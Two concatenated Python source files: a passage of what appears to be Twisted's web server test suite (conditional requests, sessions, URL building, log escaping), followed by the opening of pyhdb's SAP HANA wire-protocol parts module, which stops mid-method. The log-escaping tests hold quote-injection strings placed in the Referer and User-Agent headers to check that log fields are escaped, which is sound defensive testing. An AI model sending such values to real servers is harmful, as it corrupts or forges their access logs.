        assert not self.written, "Last-Modified cannot be set after data has been written: %s." % "@@@@".join(self.written)

    def setETag(self, tag):
        assert not self.written, "ETag cannot be set after data has been written: %s." % "@@@@".join(self.written)

    def getClientIP(self):
        """
        Return the IPv4 address of the client which made this request, if there
        is one, otherwise C{None}.
        """
        if isinstance(self.client, IPv4Address):
            return self.client.host
        return None
class ResourceTestCase(unittest.TestCase):
    def testListEntities(self):
        """A freshly created L{resource.Resource} has no child entities."""
        empty = resource.Resource()
        self.failUnlessEqual([], empty.listEntities())
class SimpleResource(resource.Resource):
    # Resource used by the conditional-request tests: it advertises a fixed
    # Last-Modified timestamp (10) and ETag ('MatchingTag').
    def render(self, request):
        # Set both cache validators.  If either call reports that the
        # client's conditional headers matched (http.CACHED), return an
        # empty body -- the framework has already arranged the 304 response.
        if http.CACHED in (request.setLastModified(10),
                           request.setETag('MatchingTag')):
            return ''
        else:
            return "correct"
class DummyChannel:
    # Stand-in for an HTTP channel: a fake transport plus a Site.
    # NOTE(review): 'site' is a class attribute, so it is shared by every
    # DummyChannel instance (tests rely on mutating it via putChild).

    class TCP:
        # Fake TCP transport recording written bytes and producers.
        port = 80
        disconnected = False

        def __init__(self):
            self.written = StringIO()
            self.producers = []

        def getPeer(self):
            return IPv4Address("TCP", '192.168.1.1', 12344)

        def write(self, bytes):
            # Only byte strings may be written to a transport.
            assert isinstance(bytes, str)
            self.written.write(bytes)

        def writeSequence(self, iovec):
            map(self.write, iovec)

        def getHost(self):
            return IPv4Address("TCP", '10.0.0.1', self.port)

        def registerProducer(self, producer, streaming):
            self.producers.append((producer, streaming))

        def loseConnection(self):
            self.disconnected = True

    class SSL(TCP):
        # Same fake transport, but marked as an SSL transport so request
        # code generates https URLs.
        implements(interfaces.ISSLTransport)

    site = server.Site(resource.Resource())

    def __init__(self):
        self.transport = self.TCP()

    def requestDone(self, request):
        pass
class SiteTest(unittest.TestCase):
    def test_simplestSite(self):
        """
        L{Site.getResourceFor} returns the C{""} child of the root resource it
        is constructed with when processing a request for I{/}.
        """
        root = SimpleResource()
        child = SimpleResource()
        root.putChild("", child)
        site = server.Site(root)
        resolved = site.getResourceFor(DummyRequest(['']))
        self.assertIdentical(resolved, child, "Got the wrong resource.")
class SessionTest(unittest.TestCase):
    """
    Tests for L{server.Session}.
    """

    def setUp(self):
        """
        Create a site with one active session using a deterministic, easily
        controlled clock.
        """
        self.clock = task.Clock()
        self.uid = 'unique'
        self.site = server.Site(resource.Resource())
        self.session = server.Session(self.site, self.uid, self.clock)
        self.site.sessions[self.uid] = self.session

    def test_defaultReactor(self):
        """
        If no value is passed to L{server.Session.__init__}, the global
        reactor is used.
        """
        session = server.Session(server.Site(resource.Resource()), '123')
        self.assertIdentical(session._reactor, reactor)

    def test_startCheckingExpiration(self):
        """
        L{server.Session.startCheckingExpiration} causes the session to expire
        after L{server.Session.sessionTimeout} seconds without activity.
        """
        self.session.startCheckingExpiration()
        # Advance to almost the timeout - nothing should happen.
        self.clock.advance(self.session.sessionTimeout - 1)
        self.assertIn(self.uid, self.site.sessions)
        # Advance to the timeout, the session should expire.
        self.clock.advance(1)
        self.assertNotIn(self.uid, self.site.sessions)
        # There should be no calls left over, either.
        self.assertFalse(self.clock.calls)

    def test_expire(self):
        """
        L{server.Session.expire} expires the session.
        """
        self.session.expire()
        # It should be gone from the session dictionary.
        self.assertNotIn(self.uid, self.site.sessions)
        # And there should be no pending delayed calls.
        self.assertFalse(self.clock.calls)

    def test_expireWhileChecking(self):
        """
        L{server.Session.expire} expires the session even if the timeout call
        isn't due yet.
        """
        self.session.startCheckingExpiration()
        self.test_expire()

    def test_notifyOnExpire(self):
        """
        A function registered with L{server.Session.notifyOnExpire} is called
        when the session expires.
        """
        # Mutable cell so the nested function can record that it ran.
        callbackRan = [False]
        def expired():
            callbackRan[0] = True
        self.session.notifyOnExpire(expired)
        self.session.expire()
        self.assertTrue(callbackRan[0])

    def test_touch(self):
        """
        L{server.Session.touch} updates L{server.Session.lastModified} and
        delays session timeout.
        """
        # Make sure it works before startCheckingExpiration
        self.clock.advance(3)
        self.session.touch()
        self.assertEqual(self.session.lastModified, 3)
        # And after startCheckingExpiration
        self.session.startCheckingExpiration()
        self.clock.advance(self.session.sessionTimeout - 1)
        self.session.touch()
        self.clock.advance(self.session.sessionTimeout - 1)
        self.assertIn(self.uid, self.site.sessions)
        # It should have advanced it by just sessionTimeout, no more.
        self.clock.advance(1)
        self.assertNotIn(self.uid, self.site.sessions)

    def test_startCheckingExpirationParameterDeprecated(self):
        """
        L{server.Session.startCheckingExpiration} emits a deprecation warning
        if it is invoked with a parameter.
        """
        self.session.startCheckingExpiration(123)
        warnings = self.flushWarnings([
            self.test_startCheckingExpirationParameterDeprecated])
        self.assertEqual(len(warnings), 1)
        self.assertEqual(warnings[0]['category'], DeprecationWarning)
        self.assertEqual(
            warnings[0]['message'],
            "The lifetime parameter to startCheckingExpiration is deprecated "
            "since Twisted 9.0. See Session.sessionTimeout instead.")

    def test_checkExpiredDeprecated(self):
        """
        L{server.Session.checkExpired} is deprecated.
        """
        self.session.checkExpired()
        warnings = self.flushWarnings([self.test_checkExpiredDeprecated])
        self.assertEqual(warnings[0]['category'], DeprecationWarning)
        self.assertEqual(
            warnings[0]['message'],
            "Session.checkExpired is deprecated since Twisted 9.0; sessions "
            "check themselves now, you don't need to.")
        self.assertEqual(len(warnings), 1)
# Conditional requests:
# If-None-Match, If-Modified-Since
# make conditional request:
# normal response if condition succeeds
# if condition fails:
# response code
# no body
def httpBody(whole):
    """Return the body of a raw HTTP response: everything after the blank
    line that terminates the header block."""
    parts = whole.split('\r\n\r\n', 1)
    return parts[1]
def httpHeader(whole, key):
    """Return the value of header *key* in a raw HTTP response, or None.

    Header names are compared case-insensitively.  The name is compared
    exactly rather than by prefix, so looking up e.g. 'x-foo' can no
    longer accidentally match a longer header such as 'X-Foo-Bar'
    (the previous startswith() test had that bug).

    :param whole: the full response text, headers separated from the body
        by a blank line.
    :param key: the header name to look up.
    :return: the stripped header value, or None if the header is absent.
    """
    key = key.lower()
    headers = whole.split('\r\n\r\n', 1)[0]
    for header in headers.split('\r\n'):
        name, sep, value = header.partition(':')
        if sep and name.lower() == key:
            return value.strip()
    return None
def httpCode(whole):
    """Return the integer status code from a raw HTTP response string."""
    status_line, _, _ = whole.partition('\r\n')
    return int(status_line.split()[1])
class ConditionalTest(unittest.TestCase):
    """
    web.server's handling of conditional requests for cache validation.
    """
    # XXX: test web.distrib.

    def setUp(self):
        """
        Build a site around a L{SimpleResource} and feed it the start of a
        GET request through a string transport; each test then appends the
        conditional header it is interested in and the terminating blank
        line.
        """
        self.resrc = SimpleResource()
        self.resrc.putChild('', self.resrc)
        # BUG FIX: the Site used to be constructed twice on consecutive
        # lines, with the first instance immediately discarded.
        self.site = server.Site(self.resrc)
        self.site.logFile = log.logfile
        # HELLLLLLLLLLP! This harness is Very Ugly.
        self.channel = self.site.buildProtocol(None)
        self.transport = http.StringTransport()
        self.transport.close = lambda *a, **kw: None
        self.transport.disconnecting = lambda *a, **kw: 0
        self.transport.getPeer = lambda *a, **kw: "peer"
        self.transport.getHost = lambda *a, **kw: "host"
        self.channel.makeConnection(self.transport)
        for l in ["GET / HTTP/1.1",
                  "Accept: text/html"]:
            self.channel.lineReceived(l)

    def tearDown(self):
        self.channel.connectionLost(None)

    def _modifiedTest(self, modifiedSince):
        """
        Given the value C{modifiedSince} for the I{If-Modified-Since}
        header, verify that a response with a 200 code and the resource as
        the body is returned.
        """
        self.channel.lineReceived("If-Modified-Since: " + modifiedSince)
        self.channel.lineReceived('')
        result = self.transport.getvalue()
        self.failUnlessEqual(httpCode(result), http.OK)
        self.failUnlessEqual(httpBody(result), "correct")

    def test_modified(self):
        """
        If a request is made with an I{If-Modified-Since} header value with
        a timestamp indicating a time before the last modification of the
        requested resource, a 200 response is returned along with a response
        body containing the resource.
        """
        self._modifiedTest(http.datetimeToString(1))

    def test_unmodified(self):
        """
        If a request is made with an I{If-Modified-Since} header value with
        a timestamp indicating a time after the last modification of the
        request resource, a 304 response is returned along with an empty
        response body.
        """
        self.channel.lineReceived("If-Modified-Since: %s"
                                  % http.datetimeToString(100))
        self.channel.lineReceived('')
        result = self.transport.getvalue()
        self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
        self.failUnlessEqual(httpBody(result), "")

    def test_invalidTimestamp(self):
        """
        If a request is made with an I{If-Modified-Since} header value which
        cannot be parsed, the header is treated as not having been present
        and a normal 200 response is returned with a response body
        containing the resource.
        """
        self._modifiedTest("like, maybe a week ago, I guess?")

    def test_invalidTimestampYear(self):
        """
        If a request is made with an I{If-Modified-Since} header value which
        contains a string in the year position which is not an integer, the
        header is treated as not having been present and a normal 200
        response is returned with a response body containing the resource.
        """
        self._modifiedTest("Thu, 01 Jan blah 00:00:10 GMT")

    def test_invalidTimestampTooLongAgo(self):
        """
        If a request is made with an I{If-Modified-Since} header value which
        contains a year before the epoch, the header is treated as not
        having been present and a normal 200 response is returned with a
        response body containing the resource.
        """
        self._modifiedTest("Thu, 01 Jan 1899 00:00:10 GMT")

    def test_invalidTimestampMonth(self):
        """
        If a request is made with an I{If-Modified-Since} header value which
        contains a string in the month position which is not a recognized
        month abbreviation, the header is treated as not having been present
        and a normal 200 response is returned with a response body
        containing the resource.
        """
        self._modifiedTest("Thu, 01 Blah 1970 00:00:10 GMT")

    def test_etagMatchedNot(self):
        """If-None-Match ETag cache validator (positive)"""
        self.channel.lineReceived("If-None-Match: unmatchedTag")
        self.channel.lineReceived('')
        result = self.transport.getvalue()
        self.failUnlessEqual(httpCode(result), http.OK)
        self.failUnlessEqual(httpBody(result), "correct")

    def test_etagMatched(self):
        """If-None-Match ETag cache validator (negative)"""
        self.channel.lineReceived("If-None-Match: MatchingTag")
        self.channel.lineReceived('')
        result = self.transport.getvalue()
        self.failUnlessEqual(httpHeader(result, "ETag"), "MatchingTag")
        self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
        self.failUnlessEqual(httpBody(result), "")
from twisted.web import google
class GoogleTestCase(unittest.TestCase):
    def testCheckGoogle(self):
        # Permanently skipped so the suite never scrapes Google (ToS).
        # The code below the raise is intentionally unreachable; it is kept
        # as documentation of how the check used to run.
        raise unittest.SkipTest("no violation of google ToS")
        d = google.checkGoogle('site:www.twistedmatrix.com twisted')
        d.addCallback(self.assertEquals, 'http://twistedmatrix.com/')
        return d
class RequestTests(unittest.TestCase):
    """
    Tests for the HTTP request class, L{server.Request}.
    """

    def test_interface(self):
        """
        L{server.Request} instances provide L{iweb.IRequest}.
        """
        self.assertTrue(
            verifyObject(iweb.IRequest, server.Request(DummyChannel(), True)))

    def testChildLink(self):
        # A child link is relative to the final path segment when the path
        # has no trailing slash, and to the directory when it does.
        request = server.Request(DummyChannel(), 1)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.childLink('baz'), 'bar/baz')
        request = server.Request(DummyChannel(), 1)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar/', 'HTTP/1.0')
        self.assertEqual(request.childLink('baz'), 'baz')

    def testPrePathURLSimple(self):
        # Default port 80 over plain TCP is omitted from the URL.
        request = server.Request(DummyChannel(), 1)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        request.setHost('example.com', 80)
        self.assertEqual(request.prePathURL(), 'http://example.com/foo/bar')

    def testPrePathURLNonDefault(self):
        # A non-default port appears explicitly in the URL.
        d = DummyChannel()
        d.transport.port = 81
        request = server.Request(d, 1)
        request.setHost('example.com', 81)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'http://example.com:81/foo/bar')

    def testPrePathURLSSLPort(self):
        # Port 443 over *plain* TCP is still http, so the port is kept.
        d = DummyChannel()
        d.transport.port = 443
        request = server.Request(d, 1)
        request.setHost('example.com', 443)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'http://example.com:443/foo/bar')

    def testPrePathURLSSLPortAndSSL(self):
        # Port 443 over SSL is https with the default port omitted.
        d = DummyChannel()
        d.transport = DummyChannel.SSL()
        d.transport.port = 443
        request = server.Request(d, 1)
        request.setHost('example.com', 443)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'https://example.com/foo/bar')

    def testPrePathURLHTTPPortAndSSL(self):
        # Port 80 over SSL is https with the (non-default for https) port kept.
        d = DummyChannel()
        d.transport = DummyChannel.SSL()
        d.transport.port = 80
        request = server.Request(d, 1)
        request.setHost('example.com', 80)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'https://example.com:80/foo/bar')

    def testPrePathURLSSLNonDefault(self):
        d = DummyChannel()
        d.transport = DummyChannel.SSL()
        d.transport.port = 81
        request = server.Request(d, 1)
        request.setHost('example.com', 81)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'https://example.com:81/foo/bar')

    def testPrePathURLSetSSLHost(self):
        # setHost's third argument forces the https scheme regardless of
        # the underlying transport.
        d = DummyChannel()
        d.transport.port = 81
        request = server.Request(d, 1)
        request.setHost('foo.com', 81, 1)
        request.gotLength(0)
        request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'https://foo.com:81/foo/bar')

    def test_prePathURLQuoting(self):
        """
        L{Request.prePathURL} quotes special characters in the URL segments to
        preserve the original meaning.
        """
        d = DummyChannel()
        request = server.Request(d, 1)
        request.setHost('example.com', 80)
        request.gotLength(0)
        request.requestReceived('GET', '/foo%2Fbar', 'HTTP/1.0')
        self.assertEqual(request.prePathURL(), 'http://example.com/foo%2Fbar')
class RootResource(resource.Resource):
    """A non-leaf resource that records the request's root URL every time
    one of its children is looked up; renders an empty body itself."""

    isLeaf = 0

    def getChildWithDefault(self, name, request):
        # Remember the mount point before delegating to the base lookup.
        request.rememberRootURL()
        return resource.Resource.getChildWithDefault(self, name, request)

    def render(self, request):
        return ''
class RememberURLTest(unittest.TestCase):
    # Tests for Request.rememberRootURL/getRootURL via RootResource.

    def createServer(self, r):
        # Wrap resource r in a Site attached to a fresh dummy channel.
        chan = DummyChannel()
        chan.site = server.Site(r)
        return chan

    def testSimple(self):
        # RootResource mounted at /foo: every URL under it reports the
        # /foo mount point as the root URL.
        r = resource.Resource()
        r.isLeaf = 0
        rr = RootResource()
        r.putChild('foo', rr)
        rr.putChild('', rr)
        rr.putChild('bar', resource.Resource())
        chan = self.createServer(r)
        for url in ['/foo/', '/foo/bar', '/foo/bar/baz', '/foo/bar/']:
            request = server.Request(chan, 1)
            request.setHost('example.com', 81)
            request.gotLength(0)
            request.requestReceived('GET', url, 'HTTP/1.0')
            self.assertEqual(request.getRootURL(), "http://example.com/foo")

    def testRoot(self):
        # RootResource mounted at /: the root URL is the bare host.
        rr = RootResource()
        rr.putChild('', rr)
        rr.putChild('bar', resource.Resource())
        chan = self.createServer(rr)
        for url in ['/', '/bar', '/bar/baz', '/bar/']:
            request = server.Request(chan, 1)
            request.setHost('example.com', 81)
            request.gotLength(0)
            request.requestReceived('GET', url, 'HTTP/1.0')
            self.assertEqual(request.getRootURL(), "http://example.com/")
class NewRenderResource(resource.Resource):
    """Resource answering GET and the made-up HEH verb via the render_*
    per-method dispatch mechanism."""

    def render_HEH(self, request):
        """Handle the custom HEH method."""
        return "ho ho"

    def render_GET(self, request):
        """Handle GET."""
        return "hi hi"
class NewRenderTestCase(unittest.TestCase):
    # Exercises per-method render_* dispatch on resource.Resource.

    def _getReq(self):
        # Build a request aimed at /newrender on a fresh dummy channel.
        d = DummyChannel()
        d.site.resource.putChild('newrender', NewRenderResource())
        d.transport.port = 81
        request = server.Request(d, 1)
        request.setHost('example.com', 81)
        request.gotLength(0)
        return request

    def testGoodMethods(self):
        # Both GET and the custom HEH verb reach their render_* methods.
        req = self._getReq()
        req.requestReceived('GET', '/newrender', 'HTTP/1.0')
        self.assertEquals(req.transport.getvalue().splitlines()[-1], 'hi hi')
        req = self._getReq()
        req.requestReceived('HEH', '/newrender', 'HTTP/1.0')
        self.assertEquals(req.transport.getvalue().splitlines()[-1], 'ho ho')

    def testBadMethods(self):
        # Methods with no render_* implementation yield 501 Not Implemented.
        req = self._getReq()
        req.requestReceived('CONNECT', '/newrender', 'HTTP/1.0')
        self.assertEquals(req.code, 501)
        req = self._getReq()
        req.requestReceived('hlalauguG', '/newrender', 'HTTP/1.0')
        self.assertEquals(req.code, 501)

    def testImplicitHead(self):
        # With no render_HEAD defined, HEAD succeeds via render_GET but the
        # body is suppressed.
        req = self._getReq()
        req.requestReceived('HEAD', '/newrender', 'HTTP/1.0')
        self.assertEquals(req.code, 200)
        self.assertEquals(-1, req.transport.getvalue().find('hi hi'))
class SDResource(resource.Resource):
    """Resource whose children are produced through an already-fired
    Deferred, for exercising L{util.DeferredResource} traversal."""

    def __init__(self, default):
        # default: the resource every child lookup ultimately resolves to.
        self.default = default

    def getChildWithDefault(self, name, request):
        d = defer.succeed(self.default)
        # BUG FIX (naming): the local used to be called 'resource', which
        # shadowed the imported twisted.web.resource module within this
        # method.  Renamed; behavior is unchanged.
        deferred_resource = util.DeferredResource(d)
        return deferred_resource.getChildWithDefault(name, request)
class DeferredResourceTests(unittest.TestCase):
    """
    Tests for L{DeferredResource}.
    """

    def testDeferredResource(self):
        r = resource.Resource()
        r.isLeaf = 1
        s = SDResource(r)
        d = DummyRequest(['foo', 'bar', 'baz'])
        resource.getChildForRequest(s, d)
        # One segment ('foo') was consumed while resolving the deferred
        # child; the rest of the path remains.
        self.assertEqual(d.postpath, ['bar', 'baz'])

    def test_render(self):
        """
        L{DeferredResource} uses the request object's C{render} method to
        render the resource which is the result of the L{Deferred} being
        handled.
        """
        rendered = []
        request = DummyRequest([])
        request.render = rendered.append
        result = resource.Resource()
        deferredResource = util.DeferredResource(defer.succeed(result))
        deferredResource.render(request)
        self.assertEquals(rendered, [result])
class DummyRequestForLogTest(DummyRequest):
    # DummyRequest preconfigured with the attributes HTTPFactory.log reads.
    uri = '/dummy'  # parent class uri has "http://", which doesn't really happen
    code = 123
    clientproto = 'HTTP/1.0'
    sentLength = None  # appears as "-" in the expected log lines below
    client = IPv4Address('TCP', '1.2.3.4', 12345)
class TestLogEscaping(unittest.TestCase):
    # Verify that HTTPFactory.log escapes double quotes in each quoted,
    # attacker-influenced field of the combined log format.
    # NOTE(review): each test overwrites the module-private
    # http._logDateTime to freeze the timestamp and never restores it --
    # acceptable here only because every test sets it first.

    def setUp(self):
        self.site = http.HTTPFactory()
        self.site.logFile = StringIO()
        self.request = DummyRequestForLogTest(self.site, False)

    def testSimple(self):
        # Baseline: no quoting needed anywhere.
        http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
            25, 'Oct', 2004, 12, 31, 59)
        self.site.log(self.request)
        self.site.logFile.seek(0)
        self.assertEqual(
            self.site.logFile.read(),
            '1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "-"\n')

    def testMethodQuote(self):
        # A double quote in the request method must be backslash-escaped.
        http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
            25, 'Oct', 2004, 12, 31, 59)
        self.request.method = 'G"T'
        self.site.log(self.request)
        self.site.logFile.seek(0)
        self.assertEqual(
            self.site.logFile.read(),
            '1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "G\\"T /dummy HTTP/1.0" 123 - "-" "-"\n')

    def testRequestQuote(self):
        # A double quote in the request URI must be backslash-escaped.
        http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
            25, 'Oct', 2004, 12, 31, 59)
        self.request.uri = '/dummy"withquote'
        self.site.log(self.request)
        self.site.logFile.seek(0)
        self.assertEqual(
            self.site.logFile.read(),
            '1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy\\"withquote HTTP/1.0" 123 - "-" "-"\n')

    def testProtoQuote(self):
        # A double quote in the protocol version must be backslash-escaped.
        http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
            25, 'Oct', 2004, 12, 31, 59)
        self.request.clientproto = 'HT"P/1.0'
        self.site.log(self.request)
        self.site.logFile.seek(0)
        self.assertEqual(
            self.site.logFile.read(),
            '1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HT\\"P/1.0" 123 - "-" "-"\n')

    def testRefererQuote(self):
        # Double quotes in the Referer header must be backslash-escaped.
        http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
            25, 'Oct', 2004, 12, 31, 59)
        self.request.headers['referer'] = 'http://malicious" ".website.invalid'
        self.site.log(self.request)
        self.site.logFile.seek(0)
        self.assertEqual(
            self.site.logFile.read(),
            '1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "http://malicious\\" \\".website.invalid" "-"\n')

    def testUserAgentQuote(self):
        # Double quotes in the User-Agent header must be backslash-escaped.
        http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
            25, 'Oct', 2004, 12, 31, 59)
        self.request.headers['user-agent'] = 'Malicious Web" Evil'
        self.site.log(self.request)
        self.site.logFile.seek(0)
        self.assertEqual(
            self.site.logFile.read(),
            '1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "Malicious Web\\" Evil"\n')
| |
# Copyright 2014, 2015 SAP SE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Enable absolute import, otherwise the 'types' module of stdlib will not be found (conflicts with pyhdb types.py)
from __future__ import absolute_import
import collections
import io
import struct
import logging
from collections import namedtuple
from weakref import WeakValueDictionary
from os import SEEK_SET, SEEK_CUR, SEEK_END
###
import pyhdb
from pyhdb.lib.stringlib import humanhexlify
from pyhdb.protocol import types
from pyhdb.protocol import constants
from pyhdb.protocol.types import by_type_code
from pyhdb.exceptions import InterfaceError, DatabaseError, DataError, IntegrityError
from pyhdb.compat import is_text, iter_range, with_metaclass, string_types, byte_type
from pyhdb.protocol.headers import ReadLobHeader, PartHeader, WriteLobHeader
from pyhdb.protocol.constants import parameter_direction
# Module-wide logger; 'debug' is bound to a local name because it is
# called repeatedly on the part-unpacking hot path.
logger = logging.getLogger('pyhdb')
debug = logger.debug

# Registry of Part subclasses keyed by their part-kind byte; populated
# automatically by PartMeta.  Weak values so that a dropped class does not
# stay alive just because it is registered here.
PART_MAPPING = WeakValueDictionary()
class Fields(object):
    """Helpers for the HANA 'fields' wire format: a little-endian uint16
    field count followed by length-prefixed field payloads.  Field lengths
    below 250 use a single length byte; longer fields use the escape byte
    0xFF followed by an explicit uint16 length.
    """

    @staticmethod
    def pack_data(fields):
        """Serialize a list of byte/text fields into the wire format.

        Text fields are CESU-8 encoded first (HANA's string encoding).
        """
        payload = struct.pack('<H', len(fields))
        for field in fields:
            if is_text(field):
                field = field.encode('cesu-8')
            size = len(field)
            if size >= 250:
                # 0xFF escape marker, then an explicit 16 bit length.
                # '<H' keeps the length little-endian on any host (the rest
                # of the protocol structs are '<' as well).
                payload += b'\xFF' + struct.pack('<H', size) + field
            else:
                # 'B' (unsigned): lengths 128..249 do not fit a signed 'b',
                # which previously raised struct.error here.
                payload += struct.pack('B', size) + field
        return payload

    @staticmethod
    def unpack_data(payload):
        """Parse the wire format and return the list of raw byte fields.

        :param payload: a file-like object (e.g. io.BytesIO)
        """
        count = struct.unpack('<H', payload.read(2))[0]
        fields = []
        while len(fields) < count:
            size = payload.read(1)
            if size == b"\xFF":
                size = struct.unpack('<H', payload.read(2))[0]
            else:
                # 'B' (unsigned): a signed 'b' turned lengths >= 128 into
                # negative values, corrupting the following read().
                size = struct.unpack('B', size)[0]
            fields.append(payload.read(size))
        return fields
class PartMeta(type):
    """Metaclass that auto-registers every concrete Part subclass (one with
    a non-None ``kind``) in the module-level PART_MAPPING registry so that
    incoming parts can be dispatched by their kind byte."""

    def __new__(mcs, name, bases, attrs):
        new_cls = super(PartMeta, mcs).__new__(mcs, name, bases, attrs)
        if not new_cls.kind:
            # Abstract base (kind is None): nothing to register.
            return new_cls
        if not -128 <= new_cls.kind <= 127:
            raise InterfaceError("%s part kind must be between -128 and 127" % new_cls.__name__)
        # Register for lookup by Part.unpack_from():
        PART_MAPPING[new_cls.kind] = new_cls
        return new_cls
class Part(with_metaclass(PartMeta, object)):
    """Abstract base class for all protocol message parts.

    Subclasses define ``kind`` (the part-kind byte; setting it registers
    the class in PART_MAPPING via PartMeta) and implement pack_data() /
    unpack_data().
    """
    header_struct = struct.Struct('<bbhiii')  # 16 bytes
    header_size = header_struct.size
    attribute = 0
    kind = None
    bigargumentcount = 0  # what is this useful for? Seems to be always zero ...
    header = None
    trace_header = trace_payload = ''
    # Attribute to get source of part: 'client' for locally built parts,
    # 'server' for parts read off the wire (set in unpack_from()).
    source = 'client'
    __tracing_attrs__ = ['header', 'trace_header', 'trace_payload']

    def pack(self, remaining_size):
        """Pack data of part into binary format (header + padded payload)."""
        arguments_count, payload = self.pack_data(remaining_size - self.header_size)
        payload_length = len(payload)
        # align payload length to multiple of 8 (wire protocol requirement)
        if payload_length % 8 != 0:
            payload += b"\x00" * (8 - payload_length % 8)
        self.header = PartHeader(self.kind, self.attribute, arguments_count, self.bigargumentcount,
                                 payload_length, remaining_size)
        hdr = self.header_struct.pack(*self.header)
        if pyhdb.tracing:
            self.trace_header = humanhexlify(hdr, 30)
            self.trace_payload = humanhexlify(payload, 30)
        return hdr + payload

    def pack_data(self, remaining_size):
        """Return (argument_count, payload_bytes) - implemented by subclasses.

        Bug fix: this used to be ``raise NotImplemented()``.  NotImplemented
        is a non-callable singleton, so that statement raised a confusing
        TypeError instead of signalling the missing override.
        """
        raise NotImplementedError()

    @classmethod
    def unpack_from(cls, payload, expected_parts):
        """Unpack parts from payload; generator yielding one Part per header."""
        for num_part in iter_range(expected_parts):
            hdr = payload.read(cls.header_size)
            try:
                part_header = PartHeader(*cls.header_struct.unpack(hdr))
            except struct.error:
                raise InterfaceError("No valid part header")
            # Payloads are 8-byte aligned on the wire; round the advertised
            # size up before reading so the stream stays in sync.
            if part_header.payload_size % 8 != 0:
                part_payload_size = part_header.payload_size + 8 - (part_header.payload_size % 8)
            else:
                part_payload_size = part_header.payload_size
            pl = payload.read(part_payload_size)
            part_payload = io.BytesIO(pl)
            try:
                _PartClass = PART_MAPPING[part_header.part_kind]
            except KeyError:
                raise InterfaceError("Unknown part kind %s" % part_header.part_kind)
            debug('%s (%d/%d): %s', _PartClass.__name__, num_part+1, expected_parts, str(part_header))
            debug('Read %d bytes payload for part %d', part_payload_size, num_part + 1)
            init_arguments = _PartClass.unpack_data(part_header.argument_count, part_payload)
            debug('Part data: %s', init_arguments)
            part = _PartClass(*init_arguments)
            part.header = part_header
            part.attribute = part_header.part_attributes
            part.source = 'server'
            if pyhdb.tracing:
                part.trace_header = humanhexlify(hdr[:part_header.payload_size])
                part.trace_payload = humanhexlify(pl, 30)
            yield part
class Command(Part):
    """SQL command text part; the statement travels CESU-8 encoded."""
    kind = constants.part_kinds.COMMAND
    __tracing_attrs__ = Part.__tracing_attrs__ + ['sql_statement']

    def __init__(self, sql_statement):
        self.sql_statement = sql_statement

    def pack_data(self, remaining_size):
        # A single argument: the encoded statement itself.
        return 1, self.sql_statement.encode('cesu-8')

    @classmethod
    def unpack_data(cls, argument_count, payload):
        # Note: returns the decoded string directly, not a tuple.
        return payload.read().decode('cesu-8')
class ResultSet(Part):
    """Raw SELECT result rows.  Decoding needs the column type metadata,
    so the payload is kept verbatim and unpacked lazily via unpack_rows()."""
    kind = constants.part_kinds.RESULTSET
    __tracing_attrs__ = Part.__tracing_attrs__ + ['num_rows']

    def __init__(self, payload, num_rows):
        self.payload = payload
        self.num_rows = num_rows

    @classmethod
    def unpack_data(cls, argument_count, payload):
        # Defer real decoding: keep the buffer and remember the row count.
        return payload, argument_count

    def unpack_rows(self, column_types, connection):
        """Unpack rows for data (from a select statement) from payload and yield a single row at a time.

        :param column_types: a tuple of column descriptors
                e.g. (<class 'pyhdb.protocol.types.String'>, <class 'pyhdb.protocol.types.ClobType'>)
        :param connection: a db connection object
        :returns: a generator object
        """
        for _ in iter_range(self.num_rows):
            yield tuple(col_type.from_resultset(self.payload, connection)
                        for col_type in column_types)
class OutputParameters(Part):
    """Raw output parameter data of a stored procedure call.  Decoding needs
    the parameter metadata, so the payload is kept and unpacked lazily."""
    kind = constants.part_kinds.OUTPUTPARAMETERS
    __tracing_attrs__ = Part.__tracing_attrs__ + ['num_rows']

    def __init__(self, payload, num_rows):
        self.payload = payload
        self.num_rows = num_rows

    @classmethod
    def unpack_data(cls, argument_count, payload):
        # Defer real decoding: keep the buffer and remember the row count.
        return payload, argument_count

    def unpack_rows(self, parameters_metadata, connection):
        """Unpack OUT / INOUT parameter values of a stored procedure call.

        :param parameters_metadata: the stored procedure parameter metadata
        :returns: generator yielding one tuple of parameter values
        """
        row = []
        for param in parameters_metadata:
            if param.iotype == parameter_direction.IN:
                continue  # pure input parameters produce no output value
